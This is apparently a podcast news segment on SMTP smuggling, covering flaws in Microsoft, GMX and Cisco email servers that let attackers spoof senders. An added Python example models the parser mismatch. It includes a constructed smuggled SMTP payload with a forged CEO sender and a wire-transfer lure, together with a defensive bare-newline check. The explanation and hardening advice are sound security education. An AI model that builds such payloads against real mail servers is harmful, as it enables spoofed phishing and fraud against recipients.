
A recently discovered “SMTP smuggling” technique is allowing attackers to sidestep email authentication checks such as Domain-based Message Authentication, Reporting, and Conformance (DMARC), posing a significant threat to organizations. The method leverages vulnerabilities in Microsoft, GMX, and Cisco Secure Email Gateway servers, enabling attackers to send email that spoofs millions of addresses for targeted phishing attacks.

A security researcher from SEC Consult revealed that the technique exploits zero-day flaws in messaging servers, allowing attackers to send malicious emails with fake sender addresses. The flaws in Microsoft's and GMX's servers have been patched, but the issue in Cisco Secure Email, which comes down to a default configuration setting, remains unaddressed.

SMTP smuggling belongs to the same family as HTTP request smuggling: it exploits two servers interpreting the same protocol bytes differently. Here the disagreement is over the end-of-data sequence that closes a message body (RFC 5321 specifies <CRLF>.<CRLF>). If the outbound server passes a variant such as <LF>.<LF> through as ordinary message text while the receiving server treats it as the end of the message, everything after it is parsed as new SMTP commands, so the attacker can break out of the message data, issue arbitrary commands, and inject a second message with a forged sender. Because that injected message arrives over a connection from a legitimate outbound server, the receiving side's sender-authentication checks (SPF, DomainKeys Identified Mail (DKIM), and DMARC) are evaluated against that server and can still pass, making the forged email appear legitimate.
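To make the parser disagreement concrete, the following added example (written for this page; it is not SEC Consult's research code nor anything from the vendors named above) models a strict SMTP receiver that only honours CRLF.CRLF as end-of-data next to a lenient one that also ends the message on a bare-LF "." line, and runs both over the same constructed session. All addresses, domains and session bytes are placeholders; the `has_bare_newline` check at the end is the hardening rule a practitioner would apply on either side.

```python
"""Toy model of the SMTP smuggling parser mismatch: a strict MTA that only
recognises CRLF.CRLF as end-of-data next to a lenient one that also accepts
a bare-LF '.' line.  Added example; addresses and session bytes are constructed."""
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Message:
    mail_from: str
    rcpt_to: List[str] = field(default_factory=list)
    data: str = ""


def split_lines(payload: bytes, lenient: bool) -> List[bytes]:
    """Split a raw SMTP stream into lines.

    strict  : only CRLF terminates a line, as RFC 5321 section 2.3.8 requires.
    lenient : CRLF, bare LF or bare CR all terminate a line (the behaviour that
              lets a receiving server see an early end-of-data).
    """
    parts = re.split(rb"\r\n|\n|\r", payload) if lenient else payload.split(b"\r\n")
    if parts and parts[-1] == b"":
        parts.pop()  # a trailing terminator leaves an empty last element
    return parts


def parse_session(payload: bytes, lenient: bool) -> List[Message]:
    """Parse MAIL FROM / RCPT TO / DATA sequences and return the messages seen."""
    messages: List[Message] = []
    current: Optional[Message] = None
    in_data = False
    body: List[str] = []
    for raw in split_lines(payload, lenient):
        line = raw.decode("utf-8", errors="replace")
        if in_data:
            if line == ".":
                # End-of-data: commit the message and go back to command mode.
                current.data = "\n".join(body)
                messages.append(current)
                current, body, in_data = None, [], False
            elif line.startswith("."):
                body.append(line[1:])  # undo dot-stuffing (RFC 5321 section 4.5.2)
            else:
                body.append(line)
            continue
        verb, _, arg = line.partition(":")
        verb = verb.strip().upper()
        if verb == "MAIL FROM":
            current = Message(mail_from=arg.strip().strip("<>"))
        elif verb == "RCPT TO" and current is not None:
            current.rcpt_to.append(arg.strip().strip("<>"))
        elif verb == "DATA" and current is not None:
            in_data = True
        # EHLO, QUIT, blank lines and a stray "." in command mode are ignored.
    return messages


def has_bare_newline(payload: bytes) -> bool:
    """Hardening check: True if any LF lacks a preceding CR or any CR lacks a
    following LF.  A conforming sender never produces these inside DATA, so an
    MTA can reject (or normalise) such input instead of guessing."""
    return re.search(rb"(?<!\r)\n|\r(?!\n)", payload) is not None


# Constructed session: the attacker holds an ordinary account on example.com and
# sends ONE message through example.com's outbound server.  Inside the body it
# embeds a bare-LF "." line followed by a second message with a forged sender.
SMUGGLED_SESSION = (
    b"MAIL FROM:<attacker@example.com>\r\n"
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\n"
    b"Subject: hello\r\n"
    b"\r\n"
    b"harmless body\n.\n"              # <LF>.<LF>: not end-of-data for a strict parser
    b"MAIL FROM:<ceo@example.com>\n"   # smuggled commands, also bare-LF terminated
    b"RCPT TO:<victim@target.example>\n"
    b"DATA\n"
    b"Subject: urgent wire transfer\n"
    b"\n"
    b"please pay the attached invoice\n"
    b".\n"
    b"\r\n.\r\n"                       # the CRLF.CRLF the strict outbound server waits for
)

# Constructed control: the same first message with conforming line endings only.
CLEAN_SESSION = (
    b"MAIL FROM:<attacker@example.com>\r\n"
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\nSubject: hello\r\n\r\nharmless body\r\n.\r\n"
)


if __name__ == "__main__":
    for label, lenient in (("strict (outbound)", False), ("lenient (inbound)", True)):
        msgs = parse_session(SMUGGLED_SESSION, lenient)
        print(f"{label}: {len(msgs)} message(s), senders {[m.mail_from for m in msgs]}")
    print("bare newline in smuggled session:", has_bare_newline(SMUGGLED_SESSION))
    print("bare newline in clean session:   ", has_bare_newline(CLEAN_SESSION))
```

Run stand-alone, the strict parser reports one message from attacker@example.com whose body merely contains the text "MAIL FROM:<ceo@example.com>", while the lenient parser reports two messages, the second from ceo@example.com. In a real chain the strict parser is the attacker's outbound MTA, which accepts and relays the blob unchanged, and the lenient parser is the victim's inbound MTA, which splits it; the inbound side's SPF and DMARC evaluation sees a connection from example.com's authorized outbound server and passes the forged message. `has_bare_newline` is the check either side can apply: RFC 5321 mandates CRLF, so rejecting or normalising bare CR/LF in DATA removes the ambiguity rather than relying on every peer to interpret it the same way.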

Enterprises are particularly at risk, as attackers can use this method for targeted social engineering and spear-phishing attacks. The vulnerabilities were found in Microsoft Exchange Online, GMX, and Cisco Secure Email Cloud Gateway, affecting millions of SMTP servers. Microsoft and GMX have patched their flaws, but Cisco regards the behaviour as a “feature” and will not issue a warning to customers.

Security experts advise organizations to remain vigilant, conduct periodic awareness training, and perform regular security tests to identify vulnerabilities in their infrastructure. The incident underscores the importance of reviewing default settings and implementing robust security measures to protect against evolving cyber threats.

This segment was created for the It’s 5:05 podcast